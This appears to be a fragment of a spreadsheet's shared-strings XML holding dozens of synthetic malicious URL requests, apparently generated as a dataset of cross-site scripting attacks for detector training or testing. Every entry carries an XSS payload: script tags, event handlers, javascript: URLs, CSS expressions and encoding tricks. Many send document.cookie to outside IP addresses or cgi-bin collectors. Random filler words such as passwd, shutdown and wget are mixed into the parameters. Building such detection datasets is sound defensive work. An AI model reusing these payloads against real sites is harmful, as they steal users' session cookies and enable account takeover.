    <t>/elelwmc0dczvpk6gmc/o5/5xomfacat6alj/rpr_47m/-c9.jpeg?d4rect=&lt;&lt;script++++&gt;[alert('eoodq3ran');]&lt;/script&gt;&amp;9zor=iaae&amp;ekeuyo=aownt5sdam&amp;ahitn7hdn7nt=7966&amp;0binszm=82&amp;kupv-oswwnm=337</t>
  </si>
  <si>
    <t>/b@ce/0btpq2vw/rimgta9/r-adtj_ldto/olq9ml1x/ier/s4mkklt/eqewmkcdjtuxearpsolb/p9tx4tvoanmzn/pnh0nimxwjale8m/xesgitrrg/bh.exe?ohhfniisihpnai=&lt;img+++src=&amp;{[alert+('srein');]};&gt;&amp;od5haaedrie=809&amp;etrvwt2teufln=j9t&amp;agpeunear3ghrt=3954624&amp;ed38slir3oaoa=2&amp;sccr=iuym@6ku</t>
  </si>
  <si>
    <t>/iyu8g4xzx/a91oateiuvdlte/ewzytll1cls/zassrt5t3a/3cletmvar_kcz/ijnr/@nb3/of6er/rdsd5mnaaadeie8mnirg.nsf?3afkmt=176&amp;iasexecqzc8ryc=tutetylenas&lt;eeathavingna&amp;6we8wuealrdrci=&lt;xml+id+=+"+++++x+"+&gt;&lt;a++++&gt;&lt;b++&gt;&amp;lt;script++++&gt;[window.open('http://254.230.206.93/ri.php3'+document.cookie);]&amp;lt;/script&gt;;&lt;/b&gt;&lt;/a++&gt;&lt;/xml&gt;&amp;iraoodarep=edivt5update/hpjnma+mjperl&amp;ffrhhwget=63729</t>
  </si>
  <si>
    <t>/0a8ayautoexec/hu7gpiofctwo/i0stpfasyeuestariglr/envivub_giodvrhows/att/aelaiguda1veeng0a8/hxng5hnjmblwl26urij/t9shoieemetweeerore/icesaoofletg1uymde/wqb_tropthome/amrljim1o.html?it20d=b7iuwawqr7ltgh&amp;5qpg=xodlionw6brssboune&amp;wpcakn=27618151&amp;aw0=tcaha&amp;yatmp8--bahdr_=&lt;object+classid++=+++"+++++clsid:...++"++codebase++++=++++"+javascript:++[window.open('http://66.70.68.121/esas.cfm'+document.cookie);]++++"&gt;&amp;xyeot=5342517</t>
  </si>
  <si>
    <t>/uoebl5leceawa7r/5ec4x@wyrszyjbsuk/seoa3xwvo/zndte/57tm7t/mcl8zj/hsyv/omhidb5oep8da/jsdnar0dtocraietwa/ernpo9_/uieh7gowcryl/_phchpsock_stream.swf?2admin@yqo.accepth=&amp;{[window.open('http://124.244.139.25/enling.exe'+document.cookie);]};&amp;hrtuedulvrn='&lt;r=ul&amp;rgzl3bmetar=nsforowhrxri&amp;sos6shet=918433901&amp;tudat=aosqtlhrtterrtm&amp;vbscript5fvszige7=1330657&amp;aooefssxscsa=32</t>
  </si>
  <si>
    <t>/wvnoq/tujr@mhetc.r/tdsruea/5d1dmosr/otimetdcemirncoy8.mdb?ozejetme=oweopdzezuez&amp;refce5=&lt;form+name=aydi++++&gt;&lt;select+name=fri++&gt;http://www.esa.com/6ele/?&lt;/select+++&gt;&lt;/form&gt;&amp;yaaaoeo=bedi2ot?&amp;tmardeynelolf=4647661404&amp;vcatutz.qrjo=oqiadsnn4ean+oe&amp;btkg=50319583&amp;dtasitdltm=nriframeeee&amp;netqr0mo=1570&amp;g2dexennd3c=aho&amp;jrgas2lfobiat=ag3camdcep</t>
  </si>
  <si>
    <t>/hs4rj5uwzaieh0ooi/0eitneitttjrnms/s0..shtml?ektnkiosmuoiema=tbjtkq@h&amp;l0h3=b5eqbaa&amp;ogcieo=&lt;object+classid+++=++"+clsid:...++++"+++codebase+="++++javascript:++[window.open('http://87.231.253.75/oral.nsf'+document.cookie);]+"&gt;&amp;hli97ssaom3enn=noa&amp;open_location@kzmszhj=heqs/omservicesndof%e$ci&amp;ra=jtetibin</t>
  </si>
  <si>
    <t>/azedfa/hatelphp/dm5naommgnrf/hs6erdngaomhn/srta6geoosanharxtpsj/al/oibnaru/msfha3stdzwnwnrtas.asmx?tzqpqgpaxp_vlboot.ini=&lt;img+++++src+="+++mocha:[document.location.replace++++('http://www.chiete.com/cgi-bin/se.cgi'+document.cookie);]+++++"+++&gt;</t>
  </si>
  <si>
    <t>/aaeatn/e@wvszxij0/s@ar/zbe8teame3ewit/lj25tne/vj0ac/lisnmyhytoeiwnrtte/zrp_htxwjyuf/aecwobeylaofvsiohfcg/uqqbsmvmy/i02r3rajy19tk8.html?ao4=&amp;&lt;script&gt;[document.location.replace('http://www.onit.com/cgi-bin/ilelneic.cgi'+document.cookie);]&lt;/script+++&gt;</t>
  </si>
  <si>
    <t>/sbixlwae1qz3eb81oi/ie2adenorsyooje.aspx?zchtpassm=o:a&amp;seoiojeqpr=olyr(ehnc+orrd%&amp;0cwe=&lt;link+++rel+=+++"+++stylesheet+++"+href+=++++"+javascript:++[alert+++('msd');]++"++++&gt;&amp;u9j8gsis=wdst5&amp;7quh.y.@a=onnidblylti1th8d&amp;ceoleesy51eec=tmdmddfr&amp;xnnp=4305790504&amp;yucf=ezcfky7ow</t>
  </si>
  <si>
    <t>/4ootw.jpeg?q6h4aq5ioevo=7493&amp;gsatnuonit=zihoscf&amp;tdpcu7brw8sc=w+&amp;rc9ehbue=&lt;link+rel+=++++"++++stylesheet+++"+++href++++=++++"+++++javascript:[document.location.replace++++('http://www.ic.com/cgi-bin/ie.cgi'+document.cookie);]+"+&gt;&amp;cnomtenoentiw=8207467&amp;ptc0k=173144</t>
  </si>
  <si>
    <t>/iryt6uul/nuf22phcrzasn_q./as/apxmqhol/hmf.timypnbo/td4nefacant/gs1jctelnet/7hait9fe5frh5hl034/miy1ite6aunseln/hz6.tiff?te7r7n=candie&amp;nafecfasn=5njizk_8ef&amp;rq1taale=4319&amp;1noiid=&lt;img+++src++++="+teolol++&gt;++"++++onmouseover++=+"+++[alert+++('ert9h');]+"++++&gt;&amp;ieeadniepdspzt=6&amp;nwn=27&amp;.3window.openwincludes=(+olsoperle+~</t>
  </si>
  <si>
    <t>/o99h_-uf-mr/mseyhwomcceqjop/erpcdleneezejiigdmtk/ul_s-daigwwvui6ygct-/e5u/ouqhiv_ol.css?2httpyq4ahp6=&lt;img++++src=&amp;{[document.location.replace++++('http://www.ilitne.com/cgi-bin/ndictais.cgi'+document.cookie);]};+&gt;&amp;es3detdr=2132</t>
  </si>
  <si>
    <t>/njpr2mapyjt.css?lz-idvb=passthrureplaceg&amp;optsd=&lt;object++classid+=+"++++clsid:...+++++"++++codebase+=+++"++javascript:+[document.location.replace++++('http://www.mang.com/cgi-bin/tielel.cgi'+document.cookie);]++++"&gt;&amp;tracr=eseesldintcemdd&amp;asalloscmrqrdem=4274&amp;eos3ett=iuz%8jt:aeb</t>
  </si>
  <si>
    <t>/e9hyy00m5a/eies/n3mms2h1iuoeaah/t6nzeunb4gqejjp4/rnleeoc9ejcr4locee.png?nwehn=7aperlieh5drvf9na&amp;1a=&lt;img++++dynsrc+++=++"+++javascript:+++[alert+('nhtaoe');]+++++"+&gt;&amp;uelfsh=67606&amp;vmolceea1=72317&amp;_4xeusini=f7woikhptfo4</t>
  </si>
  <si>
    <t>/en/wa/e3ed..jpeg?lt=00356&amp;ftd=hhea&amp;n48bdit=nw&amp;ehiruqssi=075340705&amp;lcaj8ieepenrdob=hre&amp;anqi0z9o=6963556&amp;1a=nzhrkfk8ju8&amp;81x6=&lt;div+++style++="+++++width:++expression([document.location.replace('http://www.or.com/cgi-bin/itmastie.cgi'+document.cookie);]);+++"+++&gt;&amp;bomtaifutfeawty=t]gro55cromrnvu7&amp;udhj=an&amp;r5avaetta5pp=su4&amp;tn=zw0i&amp;it8smrstzt=54&amp;ite4d=ozccnt4n</t>
  </si>
  <si>
    <t>/y4erh61ehtwo1ben3ree/nygf8ma0uoqtkhfi/oeofnonsonat/v5fzdd/g6k/opb4xabv.jsp?8g%umk0kp7wv=4&amp;wtcoivhrma&amp;wxw3mox=2&amp;riehom=oaohnzeagahn&amp;iazqk=+djwd9ouh+sf&amp;dfkcu=89657306&amp;rhjn=mshutdown0d&amp;9rgyjand=e0dq-v&amp;2z_bodympjdupdatemeta=okn$on2+mm0&amp;nwzrh2tnse=[\\xc0][\\xbc]script+++&gt;[window.open('http://170.27.88.130/li.dll'+document.cookie);][\\xc0][\\xbc]/script+++&gt;</t>
  </si>
  <si>
    <t>/nwjcc3kfbw5_dhxrl/releegpa2vnsmd3tsvv/ieu8otilpzbemsshlp/efr/d8zsu/swuatfslroyjhhs/rlo0rlldihjeierg/cs.@wb/kwmsthsygowocaoo.htm?wobmsm1u=aognf&amp;oiriurldfsiont=ae&amp;tfqr1iaoxsv=vxti1n&amp;orfbae=&lt;img++src+++="tiritana++&gt;"+++++onmouseover++=+++"++++[alert('ige1nimns');]++"++&gt;</t>
  </si>
  <si>
    <t>/dhbesrt92au2e/fodt6n1lis/f3p/sg0nga_mu@k7x8gp0jsh.cfm?v866ttmpddml6@=m1e&amp;xt=ui3tn4aooegwe&amp;kndwpasswddes=&lt;img+src+="+++reet+++"onmouseover++++=++"[alert+('5blenje7');]+++"++++&gt;&amp;eovbtssntdcdb=fuj&amp;bainsr=759776&amp;lsfsnmbmd=bodyds&amp;brcptl6ametaenph-.=tin&amp;pieoo4=228896&amp;iinepnmva=oslenbn&amp;openihttpsoiesxei@=570311&amp;ql=etp3dlhoteitavqlsz&amp;bhestttjhndi=rmeiiexec%&amp;pir5eqjclae=3ineeko</t>
  </si>
  <si>
    <t>/sf/imj6enn7tldueo/uniono7-umail33aformky5/n61bkwdtid-i-f0fvl/mese5smeicone/tum0dxinjem/xrcrshaolsah/oea/q8/hiriinvsht7cl7fyip5i/lesd0etu@n8vosje_.nsf?idlretoeaoprd=ovtl&amp;sltmhgjll=40511&amp;oooes=8lledelotacg&amp;mqo-b1=thttps&amp;evtsezd=&lt;body+onload++=++++"++++[document.location.replace++++('http://www.atns.com/cgi-bin/eresen.cgi'+document.cookie);]++++"++++&gt;&amp;sssas9tteetwal=ne|eeshutdownhhtpassjitcattt5ir&amp;e1uo=2e8srntiorjgikobhn&amp;allm=462267004&amp;csrioewt=41149297&amp;y@mj=owt57tvepps&amp;aomtixuel=6qjoz7y6ib&amp;d5eheqyehd=6093391&amp;otmm6roas6begm=6ek6&amp;ceatd=08402109</t>
  </si>
  <si>
    <t>/egeneergnhzrsfeap/xd/goiretr.asmx?q%ushutdown4=tyonadgnstili&amp;2e73nj=&lt;![cdata[&lt;!--]]++&gt;&lt;script++&gt;[alert++++('nrd0db0');]//--&gt;&lt;/script+++&gt;&amp;gfkatqyedesr=ura5+sw;]efnph-e:&amp;bf3jopenzujw2s=enoih&amp;hiw=cear5tohfl</t>
  </si>
  <si>
    <t>/hydeonyvolhesze/ated5d3inrw/sm5-ciqoloy8pv4bs_z/bfvuy_vv0/zinogpasswdjtaaic.r/6zwofppqaaksija2u0/ml2yl.asmx?teclnrinpt=52856926&amp;oe9lrail7=skb7a&amp;dtetpnyiatoowa=89&amp;ae=[a+cse(nhts&amp;l4erd2t=rm8s++xsltstiodichildhttpzru&amp;es=uuizugsmfe&amp;cr04g8kl55=82&amp;ettptponq8=mremh2oncalr&amp;oprf-8hqd3=&lt;img+++++src++++="+++anal+++"onmouseover=+++"++++[alert++('ad');]+"+++&gt;&amp;gcofbasosesx=[ecganrhoato?&amp;om5ao6no=telneta+sf:sen5ni4hio&amp;jos=oi</t>
  </si>
  <si>
    <t>/xks2-kvb7fl4p-mrfkb/5f56a49qx8a/rogxae.1qo97urioy/sve2edse6es5nmnatf4o/isx/ageexa/e-fehtx.sh?zrcopyyrrffb3=&lt;bgsound+src=++"++javascript:++[alert('sdnahwm');]+++"+&gt;&amp;04roolr=nshz7si&amp;3hsynasxs=6e3ane4x&amp;kju6_feuqfxf=&amp;itwpp&amp;acceptw5z=gdo0selecta&amp;fpnfedtse7j6ies=eemisterooan8&amp;cascw0eecetu7ta=aee&amp;grxde5weenu=ar=@yw|teuiperlr&amp;erae=011054&amp;ychttu6xaoegs=auqeuvse1s&amp;yp3zal0an=1260890915&amp;naeotiw=08235&amp;6miliors=)a0ectthh0taet&amp;9j=rwnueahitrtoftt&amp;ttwehhnjne=e7s5anroteo3zur2i</t>
  </si>
  <si>
    <t>/hhvoghpbunngfe.nsf?dzhiierebcsn8c=&lt;!--+--+--&gt;&lt;script+&gt;[document.location.replace+++('http://www.stil.com/cgi-bin/sian.cgi'+document.cookie);]&lt;/script++&gt;&lt;!--+--+--&gt;&amp;n873=ihn&amp;48p_o9jtzfv=masamarexp_rxmp</t>
  </si>
  <si>
    <t>/pwtneeybettire/s2moavbk9/ma0deklu/nlxiyy/ty0u0nsbjsel8pf5au.png?temejpah=1768&amp;wuet=aedjs&amp;cnoij1pmode2weh=lha/9~or&amp;lah=4371&amp;mtramao=61&amp;cepo=8327974&amp;eay9essttema=e+httplwinnt88u@seiet&amp;lnretgyd=nt&amp;nhaotw=&lt;bgsound+src+++="+++++javascript:+++[alert++++('r0');]"++&gt;&amp;azza=it8ieickcsr0i&amp;ia=vrailwo&amp;9idrotneginzim=22&amp;ssnrhzrlhte=+aee1l&amp;najreaotflo7=av@kevk</t>
  </si>
  <si>
    <t>/eela1rbr7tnhvaiuslen/ooiesd5e5aemsilo/e6.1rmiuq@gt/rdudnne/n2.4ogarmfzql5lp/dch.js?izvufq=3duwtugyrqeoo&amp;a4gueenree8ad=&lt;div+++++style++="++behaviour:++++url([http://www.iciten.com/script/sifctlracs.asmx]);+"++&gt;&amp;gp_aww=0&amp;olhute80itet=evaly&gt;ai&amp;ipositioninclude4nl&amp;ube=r&amp;q0nsemp4a8l=2946632&amp;e9owsdeimc=325868&amp;ahjwf=srebc&amp;nettleus=5&amp;mdp=httpphp8aijasee'bvo&amp;hraevf=azz4a&amp;g@rh3=d8+%tgriiuinputntn&amp;f3iinsattlth=jw9i&amp;zu.gsv64=24</t>
  </si>
  <si>
    <t>/ze3yewoisrssnie/a_lmmhvmras5pscwhn5.tiff?qowtiw=iei&amp;eiin6nr5=:su5nfexg&amp;9esnch=fds&amp;a1wnwicrz=4kdhfvk@u4oh&amp;qseyhfcdadc=rstdinny&amp;xs=&amp;+im&amp;eeentntauuiteas=014&amp;drncr=8cl&amp;o8eosotgnt9idaa=etdlebh&amp;bboclwntnue=ent_b-rlsaek&amp;2hncv9=access_log&amp;roqeafawiytk=&lt;object+++++classid++="+clsid:...+++++"+codebase+++=++"+++++javascript:+[document.location.replace+('http://www.ermeas.com/cgi-bin/sitemele.cgi'+document.cookie);]+++"++++&gt;&amp;guhfobnanrecqn7=+aeklvnpassthruekwuy&amp;hxswagklfofl=rjmpkyh</t>
  </si>
  <si>
    <t>/6bvsrtapinre3wedae.swf?ki=hb.yh_m9lwlu&amp;istem=&lt;&lt;script+&gt;[document.location.replace++++('http://www.il.com/cgi-bin/stolin.cgi'+document.cookie);]&lt;/script++&gt;&amp;laih8atluidosal=m/positionlcf$nyb&amp;ehds=1496993&amp;4b4i7d=mcil&amp;e91wie8nalxcr=ezn&amp;gc=oxw94d1iv&amp;nmeee2est6u0ti=1q&gt;orn)1ehmcatxmlta?yfn</t>
  </si>
  <si>
    <t>/y4atrjen5hfnitkr/swwu4trquoutans/sptk/e4ix/ycynwfsbj5wwndlike/ee/4dvsmra0nqw5meegnv/pp0.css?sgtnz=522&amp;shooljmfe27t=6542988172&amp;bnnku=&lt;img++dynsrc+++=++"+javascript:[alert+('go');]+++++"++&gt;&amp;52pcdmtqthi=352988&amp;g4ont7oiuest9r=aa</t>
  </si>
  <si>
    <t>/e@wickbpwxti/ngte/ep2lbgyun2q9@h6a/tccq0w7tq@jms1bgzb/qcopy/tmpkru/-0/cp9b6nh4ro0/6rtlanf1nfontlras.jpg?tni0ai=101340&amp;sophrs5ae=ao&amp;nqtwaodd=vtm&amp;gfawryte=a@bjv.e9kcxq&amp;0execfdfromupdate5gfe=94&amp;osrs4tvdcul.=&lt;object+++classid+++=++++"+clsid:..."++codebase+=++"javascript:+++[document.location.replace++++('http://www.mani.com/cgi-bin/trni.cgi'+document.cookie);]"+&gt;&amp;n6=ryiiq&amp;ooquvemiscffstu=60393&amp;8od=&amp;6+&gt;pl]e2;somwl&amp;sa1ase=ln1hantrnnhrtvdy&amp;toaneee=t3throcepdae&amp;r9leybnflocation=idnlbhd&amp;roi=eajiopvq&amp;uz5jhrfs9s1=eiinz</t>
  </si>
  <si>
    <t>/ef95i8mbobcki/tzbfidkxuh8jc/eictbt71opauu/iaoasrcceeieh7cee/ot/ocddz2pjvy9vclq-/27xucj-v/fgzkrdfi7mn/e0@-xcs78txz9s1z/idclkzhga8aa9h.pl?aqaq6oefnieeapa=spsy&amp;tuab=&lt;input+++type+++=++++"image+++"+dynsrc+++=+++"++javascript:+[document.location.replace('http://www.onre.com/cgi-bin/orning.cgi'+document.cookie);]++++"+++&gt;&amp;zol3lyeutn=-s&amp;s4sae0pchnh=sen&amp;st=httpi2eaib6+8co&amp;aednoce=ia6cweio</t>
  </si>
  <si>
    <t>/6xj.qjcbwm7dldfsnkek/9gttehhhnjeh/bcdztl6pn/rtelnwnpesgic/6.mgakb3qmp/aitihrfseewsornu/ysv60as4g0_j5zr/osdi1cs/m69gvc/81qcv@ezyvcfi/8r9ev..gif?aunfwt=216709&amp;aaunuuvi=aane&amp;wahrshhpifc=10&amp;unai2w=&lt;style++&gt;&lt;!--&lt;/style++++&gt;&lt;script+&gt;[window.open('http://166.102.30.211/tianie.cfm'+document.cookie);]//--&gt;&lt;/script&gt;&amp;rrjigrddphuwsel=59797252&amp;hlxltm=dy0e&amp;d8teh3=vogsefittast1+&amp;8eoyt=wtx&amp;iamhd1=s@3r</t>
  </si>
  <si>
    <t>/tpasswdcod0a5cttliopto/iwyl/mkthk25n@xu74nysg6y@/dfx/a@0q/yfee/-wwt3limgvexo2/bsasltyerrsglst3rfea/t4hzsqvmv70bxuk-v14/mie84ntg/rci3aeenpm0otu/eopa8g_ukbobfm.htm?y8trexseas=&lt;input++type++=+++"+image+++"++dynsrc++++=++"++++javascript:[document.location.replace+('http://www.erni.com/cgi-bin/maoran.cgi'+document.cookie);]++"+++&gt;</t>
  </si>
  <si>
    <t>/hcmkxhst/2wgereae/poneu0lahoyfoedldpu/v6/oujv-uch1au/op76aq_xtclhm@lo1.js?hbaods7d=frshutdownpa&amp;drbfsolehlcw=aomx95e0o&amp;iawl=open&amp;vrootrsedh=cinrreisa&amp;t0mitntsnrsel=&lt;img+++dynsrc++++=++++"+++javascript:[window.open('http://76.41.7.214/on.msf'+document.cookie);]+++"+++&gt;&amp;@@d@zkhtpassrkca=686133&amp;htkwxosnloihdy=dobjectio)tform+s7execura</t>
  </si>
  <si>
    <t>/th/awiframepiw_da/nhce/563erb_tp-m8/pcbmnnggygsj8qecho/tyhjeothbqx4f.asmx?iereetrbtaxsr=no_pqpykxe&amp;abixtim76=43269&amp;sdn=+ni%&amp;qelsedthml1io=qeoe\\edynmrrnia&amp;ihato=oi&amp;be=2&amp;ib5jprocessing-instructionr=&lt;div++++style++=++"width:+++expression([document.location.replace++('http://www.niri.com/cgi-bin/st.cgi'+document.cookie);]);+"++++&gt;&amp;iaaco5os=8</t>
  </si>
  <si>
    <t>/ttesai8a/dxss9ho./abb7gr0r.4hex3/heoorrli/tgkmf_o.givs1a8mp/c5zqpjtgrruvc/m0k/unnedtnle2naxnuttaor/tca8rn7oiaer.exe?edst2e=gefi8srh4&amp;k1wgm=&lt;img+++++src+++="+++++ietiri"onmouseover+++=+++"+++[window.open('http://243.205.129.77/sedeli.jsp'+document.cookie);]++"+&gt;&amp;muvo=etoroioelwcofeunto&amp;0yg41=vmin8xe3igfk</t>
  </si>
  <si>
    <t>/o3n4liy25ppyio9nao/ab3ji/g@c.b2rxtluunp4@mn/24qpmpo5mssoyq7/nr08ol0d.css?ev=ait+&amp;tgnnk=1&amp;ao3oenea7idad4e=tpp4ufyyrda&amp;xtermokquj=nb&amp;nwi=7003425&amp;rskoqjollevo=&lt;meta+++++http-equiv=++"+++refresh++++"+++content=+++"+++0;url=javascript:++[alert++++('taoa');]++"+&gt;&amp;mdiebd3edeeavdm=zdhul</t>
  </si>
  <si>
    <t>/vejramxlchntexo/eaxhe61httoawbi/om3w@0/w./rmyussjy1qv/h4v4rrwhhqexznedzxkz/yy7.9slahx4_4z52t3k/jg/edeeo7tlast8isehnune/crcuy.jpeg?otl=&lt;&lt;script+++&gt;[alert++++('hn4tii');]&lt;/script++++&gt;&amp;sufbdsaj=wtaostealuditedewh&amp;nu7ec=welenhemochaa&amp;hkhrznsztenre=s)eop40aasc5&amp;soysgcjettefq=86463450&amp;eter7h3recf=708&amp;kkincludei6zh_=~mteh&amp;roeedcyo0teeaqa=060&amp;g9uehisks=57&amp;ths2adepoenx3=hiolzstrdor&amp;u6auc2xtmpt=toxcjeooy76anprund&amp;fyi0=ashutdown8i&amp;kckk-rq1qpdivv=mdr</t>
  </si>
  <si>
    <t>/pk/cb0rget.png?35co=zqyv&amp;b_xe.qcnhe.=&lt;img+++src+="++javascript:[document.location.replace++++('http://www.eniendit.com/cgi-bin/llanatla.cgi'+document.cookie);]"++++&gt;&amp;_c3iftpo7zid3=263131462&amp;rhtetbch29l9yl=155&amp;pu3aiyfg=aiebh+</t>
  </si>
  <si>
    <t>/mxsmi4qtf_w/ednz-aep9/ue/w7ww.php3?on9uw9oeclswe=ed&amp;yeo=o4n&amp;hgeiwnq=lnczm&amp;joovrataeerrt=&lt;xml+++id="+++++x++"&gt;&lt;a+++&gt;&lt;b+++&gt;&amp;lt;script&gt;[alert++('ielmoft');]&amp;lt;/script++++&gt;;&lt;/b++++&gt;&lt;/a++++&gt;&lt;/xml++&gt;&amp;uonthfsr=2&amp;7fqmetaubbaccept@y=qanee41i&amp;enlae9t6fh=olctk3igioteor+&amp;rqowhere=hjeyi&amp;tw=uo&amp;dpot=8722158799&amp;htreaasi8ipbeci=htt&amp;24t3os=069&amp;asnrewutne4lyna=ocirreooeie2alie&amp;rsthrsonml7ze=wedocumentese?a0exrnetcatinpassthru</t>
  </si>
  <si>
    <t>/qxppkjkts-r997rxss/rnrg5g_otabmkipciuq/e3tyos0dm/kinf3_sbzwsjem/onlatonao0lrceeree/iej/ajesymlgvxg/estsnscno/8mlhugokgw-f_/a3ety/rwptbfstdin/km.tiff?ca@gvsyk3nullppasswd=&lt;img+++++src=++++"+++++livescript:[alert('ky9eahrt');]+++"++++&gt;&amp;neeeneoani0f=+hi'v&amp;g5aadrr=a%tfpaagr&amp;h&amp;u5ipv=n6_mefzm&amp;temelitad=jleee&amp;rosetqmwoorke=ozvp&amp;tz1=g5d7914pnok&amp;ionk620logwu=er</t>
  </si>
  <si>
    <t>/n9vywh7cm6oqw/s2y5aeif-r/sqrnodexp_gmnwdyc/aseqiaua9nt/dz/terta/nmies/aencqisttrrnai/ngoinf.jsp?seezyehl=177&amp;thnr2e2wqer=todphpcyr&amp;b6auz=tektwe&amp;tmemobs=ssi&amp;2lnryl.itelnetxk-=$d+g@esa+between&amp;3rhogee6ele=h&amp;a5=z+&amp;i4fromet=9&amp;0ag0h=en&amp;7a3a=22&amp;pdrpositionphttpmnuabk=4320&amp;fnbgowi=lrvprocessing-instruction1nihen&amp;ee=&lt;link+++++rel++=+"++stylesheet++++++"+++++href++++=++"+++javascript:++++[window.open('http://120.59.12.60/ge.swf'+document.cookie);]++++"+++&gt;&amp;s6vnraqlosh=qfl5wn&amp;nzrns=20517630</t>
  </si>
  <si>
    <t>/evdvbvc/bhtewwrnopte9iattn1/ti7n5_hprjvjqw4nrv/pedeelerzh.dll?utaexfemfp=oqu&amp;redneseil=&lt;img+++dynsrc+=++"++++javascript:++++[window.open('http://165.126.163.152/anit.jsp'+document.cookie);]++"+&gt;&amp;snyengiflnlnt7s=siifttgirr+</t>
  </si>
  <si>
    <t>/0jms4/8srwdaehiae/yl1hrkeqc/eehrlwe9tib/nan7/osatcaeq3snotdor/i5ajvmesgbb/c5t/rcfmed0n4o0r/iblafdd.asmx?ptrfptihg5r=&lt;![cdata[&lt;!--]]++++&gt;&lt;script&gt;[alert+++('eaisinie');]//--&gt;&lt;/script+++&gt;</t>
  </si>
  <si>
    <t>/jonchw/1oofryv7vsiw1y/gn9es8h0dfrisets/nksuooalds0uv/rmt/3ers64anyod/rmysbl/eopi@kdmuni881zebnuo/masmbdedesoo8xnsotsa/0kme/iwkq6talc.tiff?rdcek=1608&amp;enpgnaesdsteau=[\\xc0][\\xbc]script+&gt;[alert++('nonst');][\\xc0][\\xbc]/script&gt;&amp;iirtoetzo=spieint5a&amp;eliodarto6mn=77094</t>
  </si>
  <si>
    <t>/i5lt3w/lnpujyp6emzco4f4/yzx.0bfzg5l/lv/ylxb%udlibwl/orwti.exe?h7s8=ho&amp;utoteyt=411926&amp;eisntti==eqh&amp;sti=&amp;&lt;script+++&gt;[alert++('5ptjh');]&lt;/script++&gt;&amp;ilr=nzusxk&amp;otncmph=osnendde&amp;teenaokt=thoosi</t>
  </si>
  <si>
    <t>/didag2/rmyyilomtz1ymu0o3rm.jpeg?tdd=&lt;xml++++id++++=+"x+++"+&gt;&lt;a++++&gt;&lt;b+&gt;&amp;lt;script+++&gt;[alert++('snftegs0da');]&amp;lt;/script+++&gt;;&lt;/b++++&gt;&lt;/a+&gt;&lt;/xml&gt;</t>
  </si>
  <si>
    <t>/sk/eezpharitrzrey0d9jth/srtr5u.png?tlpius9bnootn=oa'fneconnectihh+yo+&amp;eca=hounc+t&amp;rb75from8g=owro&amp;n9tihndua=aue&amp;eoe=cdkl&amp;teeeas8ateano=86864356&amp;ruaetu55oy7=e+6&amp;h5u=eiuennmhpaae&amp;jad2s=%ihttps&amp;adikn5auoroueeb=&lt;img++src+=+"livescript:[alert('udd');]+"++&gt;&amp;vfwinsabutnrrue=ea&amp;aasie=3n</t>
  </si>
  <si>
    <t>/srfethfeuata/iueght/gldwnid9-@/xuqvuwscriptigx.cjtu/et73thqyn221/rareioleifhvceepma/9cyj/-qqk9vqa2@v/efrdysdresxujwrh/dw2-./tanpeazw6echleagoir.htm?tiuady44fspt=&amp;&lt;script+++&gt;[document.location.replace++('http://www.ieniti.com/cgi-bin/veilgeicnd.cgi'+document.cookie);]&lt;/script&gt;&amp;nateh2ietrt=531457805&amp;tr=11299&amp;ltb=e5mc7nvdp</t>
  </si>
  <si>
    <t>/cc.html?uldurc6hlasxu=713160&amp;zhsotclo=&amp;{[document.location.replace('http://www.nselst.com/cgi-bin/ll.cgi'+document.cookie);]};&amp;in1bfx=8905656&amp;93sxowp-==7processing-instructionir]fwvbscriptweevalsy-o&amp;dqtodl=6&amp;nta%ul=438626&amp;yqkqfve=d1itlet&amp;alnhedhre6j=d5?&amp;sadei=5828&amp;xpoctto5ay=eallg&amp;ateat=6</t>
  </si>
  <si>
    <t>/jsxsz9qzat5y87d4ui/s-48gyhw-3izqs5ka6/pstsrneqkjjnrcjx0g4/eaakn/ldhxnask/oeim/rhbpdqb29lzgd6ot.oci.mspx?5tmprgcpgxu=&lt;xml+++++id+++=+"+++++x++++"+++&gt;&lt;a+++&gt;&lt;b+&gt;&amp;lt;script&gt;[alert+++('btiinn');]&amp;lt;/script++++&gt;;&lt;/b++&gt;&lt;/a&gt;&lt;/xml+&gt;&amp;nhli0enssa3=768729964&amp;oncrleoojudmt=his8mzersqez&amp;nxlre=8&amp;4z36ahgeeao=7&amp;oota1atgg=p&amp;tr=smaccess_logtzud7lett\\</t>
  </si>
  <si>
    <t>/i4b/f7/hqczqlgjw/amgx@qyyg89czsby/fr@it7vxhtacces/21usodrm3n/rshutdownkjmt_dybor/oelg7er/mjehte5fl/net1slriaatnda/bmcmfdrcstts/ot@x7edyao0-i6m.php3?fuau=l5mjufdxu&amp;1rmab4ii=&lt;input+++type+++=+"image+"+dynsrc=+++"javascript:++++[document.location.replace+('http://www.esat.com/cgi-bin/titrin.cgi'+document.cookie);]+++++"+++&gt;&amp;ndon6rhjhn=005&amp;yod6=5492309&amp;ranbwtyneeg=97496&amp;gtsgetins=wz&amp;me26kde=er&amp;1jdaavt=aka&gt;&amp;reou0hu=ismv2uw&amp;htaccesgyoqaa=222967&amp;euq3puyu=oipsiren+n&amp;cwavqv=wibvm=6oqx7&lt;ise&amp;rt=5iity</t>
  </si>
  <si>
    <t>/3wxqf2pjttu-1/aat/kecpsoysttaatemhw/pebi6e0ueone/mpdvbnetcatmetahep-/1f8ocyio.js?niedbbihne=&lt;img++++src=&amp;{[alert('i56iar');]};++&gt;&amp;oterbfta2etrfpe=0757&amp;bc2f4=34&amp;g-wu8t=9x@&amp;pe.@=php=toeimb&amp;lo4bgsound=bin3&amp;ssaahaln=rohr&amp;nrpasswddo3tzp=wjld&amp;b4rogtc7nri=leec+/et</t>
  </si>
  <si>
    <t>/8visqlfcy9/s27ca@a5zunwujkb/e-i4cjfi0ougyjggs/zaf/ornnnojoldbveetvi9/access_logw.htm?lt=ct3ave&amp;te=[\\xc0][\\xbc]script++++&gt;[document.location.replace('http://www.enar.com/cgi-bin/ro.cgi'+document.cookie);][\\xc0][\\xbc]/script&gt;&amp;dsq=usde8lled&amp;9itnb.usbkr=nlilase;aia\\aum\\hichildv&amp;axsdir=rgatysts2nhitr&amp;pli=281&amp;o6s7wgetj=tiybtrfwehdrop&amp;x4dz=onose&amp;iehnonv2hjbmvq=9hu+onsock_stream&amp;szeitftftweeytn=deletecwz&amp;dncxe=ygn90n+ee?y&amp;mnhhi=ht&amp;bylaiec8wa=ho9ei&amp;atowvebbete=12040571</t>
  </si>
  <si>
